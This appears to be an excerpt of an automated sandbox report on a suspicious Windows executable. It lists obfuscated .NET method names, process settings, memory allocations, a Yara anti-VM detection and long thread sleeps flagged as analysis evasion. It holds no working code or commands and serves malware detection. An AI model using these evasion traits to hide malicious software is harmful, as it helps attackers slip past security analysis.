Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, W8StgQNVUPN6UaF5Po.cs	High entropy of concatenated method names: 'wq99HvRhWt', 'YAR96oGWOu', 'jOD9MZiOwo', 'Waf9NxIlTv', 'GSk9SB5MlR', 'RtM9T6wyqx', 'Rh99mn6YkU', 'KcS94hNpyc', 'v889t3YG88', 'WCV9D4qFMM'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, atVKPSx2tbLvbWqRD8.cs	High entropy of concatenated method names: 'brJOCrstiS', 'HowOdAO2Cm', 'Yt0ORTUhjR', 'orIOU4AxQH', 'In8OIeOAi3', 'UbjRlXWd2q', 'L3OR2bZLOH', 'KW7RPplAgT', 'IwBR7K8jKx', 'CVBRBuHINt'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, W571SEgfpXscu85C0rV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E1TDG1AqEG', 'Y1kDi12uRV', 'QI1D0eKWc8', 'ch4D5FHxxk', 'UPPD3Ws39m', 'OFRDkqql5W', 'HxADwmUh6f'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, liVkvfggQSD8XmxErJo.cs	High entropy of concatenated method names: 'ORPDvls96B', 'IN0DzIr6IP', 'guJYf0Mb6g', 'RffYg720mr', 'JbqYskTUjK', 'OMyYXsgjdD', 'yTuYc48esA', 'ecKYC8YU4v', 'hECYJ3XjcD', 'LtKYdh0DDD'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, qA4Mfq5f2bJoMiWHK5.cs	High entropy of concatenated method names: 'c3pSW29dld', 'j27SiZnALl', 'fFwS55sjRV', 'NflS3PJSIL', 'OdIS8QB1jX', 'bv2SpqBeeS', 'VEMSaohZfe', 'wEHSQfJJwm', 'lAASbQYs8X', 'UBjSLNg6O3'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, ERft7DgcBL5iFFQDmx5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gVoetSQ0rd', 'w9NeDm88D6', 'CTeeYD8NZ4', 'GQ9eeJCqyD', 'PQteKaZCSM', 'fXUeFn2C3Y', 's26eyJ3Vgw'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, eVanR68tnSKQK66uPD.cs	High entropy of concatenated method names: 'q1t5RWlrK58jD3O8Dcq', 'S4GvYVlCay6HKuCX6BS', 'LclO4EmH2v', 'BLUOtOHF2n', 'jKdODXispV', 'Y7tu8vlce1CXjftGFbF', 'JPqEPDlWx4gCaASIjb1', 'KIZgYhlkp8Au87yhUb3'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, aSjEPsLbuW3jf20UBT.cs	High entropy of concatenated method names: 'c0yUJsOCFi', 'voBU9CyGRx', 'gN8UOHVmV5', 'rrLOvRTYjJ', 'ELtOz0rKgq', 'cByUfpgAUN', 'CNCUg0MA7k', 'M2PUsuAcFk', 'VdpUX5RtIN', 'paFUcdsuN6'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, jsBSrpdl90mkPRHphX.cs	High entropy of concatenated method names: 'Dispose', 'oeigBubcCx', 'n00s8Fp8C9', 'sXxs8GvxH9', 'tKZgvc4bAC', 'fpsgzuYBvO', 'ProcessDialogKey', 'cV8sf7pQ8C', 'AdLsgVw6QA', 'EL1ssW8EUl'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, fYlf55uO9qRUHNRX8e.cs	High entropy of concatenated method names: 'SKFUn9ZuEK', 'IS2Urea5iQ', 'IreUqQ0XQw', 'aSbUHxKEUm', 'BO7Uo2gFWh', 'qxTU66mduf', 'ECyU11B1wT', 'qFFUMZPqPc', 'yJkUNdPIQl', 'y69UV6NrHL'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, H7pQ8CBHdLVw6QANL1.cs	High entropy of concatenated method names: 'wWxtxxQcKq', 'Dp4t8VpZgh', 'OqQtpvFxvb', 'od7tar8Qv7', 'YLBtQxdGdN', 'AJDtbCijDr', 'xKWtLot9Mo', 'TnTtAKLQZd', 'ktEtufV5Rc', 'vFZtWcD98a'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, LM0OeQV9x9n8HxvovT.cs	High entropy of concatenated method names: 'b3gRobTMr8', 'e7eR13FAug', 'R7b9pHsb1B', 'CD29aFyrYc', 'iZe9QILBQV', 'QcN9bcCAJA', 'UGM9LLyrpS', 'CKg9AqOhUI', 'ISy9uHKRZF', 'thN9WqyWLY'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, BaxJhW0F4KUltsVN4x.cs	High entropy of concatenated method names: 'qkyjMaucwk', 'd77jNCa5Fc', 'puZjxIVDXo', 'tYyj8OKqii', 'kNZjafdrRE', 'uEUjQlPGt9', 'F0djLFTGyd', 'gu5jAAposY', 'bXLjWVwwd1', 'CVvjGOOJgT'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, FZkNlusRgZCphNaaw4.cs	High entropy of concatenated method names: 'JG3qiTvfo', 'aqhHvnfAE', 'xD36JBIPK', 'd9s1qZEbS', 'Gn6NS7Nse', 'c7bVC4vLE', 'FYr45SGcdiZhlPruB3', 'dvos04orDNIn5kAEds', 'Xoh4SpvDg', 'PK5D17psV'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, UL3kywkE1DcMHcp6yo.cs	High entropy of concatenated method names: 'ToString', 'zQJTGmNVgY', 's3gT83pIY2', 'vQbTp2SItl', 'ihrTasgMV9', 'j9qTQ7QM8N', 'HfVTbT3bTR', 'kqPTLeHnNE', 'BUFTAlII5p', 'HaQTuCCbb6'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, M9eYWDI95I4qYnEqnl.cs	High entropy of concatenated method names: 'f2YXC7CAWF', 'Y1tXJ0ASSd', 'h6NXdybaG3', 'mwXX9rPIJO', 'YOvXRbcxDg', 'XZsXOhDZes', 'KKcXUTjXBX', 'zi9XIW38X3', 'ej2Xh3MiRl', 'e8SXZ6UviL'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, J3rUP09BcynVHwjb7x.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BwesBGA1uy', 'iJesvc9aT1', 'P30sz9OTKp', 'KiyXf6hTM7', 'jSgXgHEfrc', 'mLIXs9DvEZ', 'TewXXvtA9G', 'Xj08rGaJ7WZyQK3xVOr'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, N8EUlbvG3jS7xNCTuj.cs	High entropy of concatenated method names: 'jUUD9oKqYv', 'CuTDRlHPZ2', 'JeiDOIcVsl', 'hhRDURIb4m', 'DsBDt4VrZA', 'aZWDIwewES', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, v1HahZzrDNN7Xf4KYj.cs	High entropy of concatenated method names: 'XR9D6JN0pH', 'Xc5DMmRB8H', 'dIBDNg5ZHw', 'k4SDx0FN15', 'VxdD8nmesc', 'nwRDakXoYP', 'gDODQTeX1X', 'oPpDyYNGO0', 'bZADnrYNOc', 'cS0DrEyfOv'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, fmgILnc5aLBALle6mb.cs	High entropy of concatenated method names: 'UHNgUCwjKM', 'EiOgIdRA7u', 'JVUgZPN6Ua', 'w5PgEoLM0O', 'GvogSvTftV', 'vPSgT2tbLv', 'xpZxOnN86EMeiCefYc', 'waWweJK9LpK6eZ4oN5', 'rRcggnX618', 'TEEgXDoVGi'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, ggu6BDwa8ZgZHdPNpy.cs	High entropy of concatenated method names: 'lq0mZwyusT', 'vSlmEj6QwK', 'ToString', 'YPsmJJuK0N', 'wLMmdmDKXd', 'VfQm9e7Mue', 'QV9mRlFiiL', 'R53mOQZsSd', 'tkvmU3hx0C', 'wwimIyQeMX'

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTR

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Memory allocated: 1520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Memory allocated: 3090000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Memory allocated: 93C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Memory allocated: A3C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Memory allocated: A5D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Memory allocated: B5D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Memory allocated: BC20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Memory allocated: CC20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Memory allocated: DC20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Memory allocated: 1070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Memory allocated: 2C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Memory allocated: 10F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599747	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599631	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599515	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599372	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599265	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 599047	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598499	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597295	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595874	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Thread delayed: delay time: 594562	Jump to behavior

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Window / User API: threadDelayed 1547			Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Window / User API: threadDelayed 8287			Jump to behavior

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 7548	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6172	Thread sleep count: 1547 > 30	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -599859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6172	Thread sleep count: 8287 > 30	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -599747s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -599631s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -599515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -599372s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -599265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -599156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -599047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -598937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -598718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -598499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -598390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164	Thread sleep time: -598172s >= -30000s	Jump to behavior
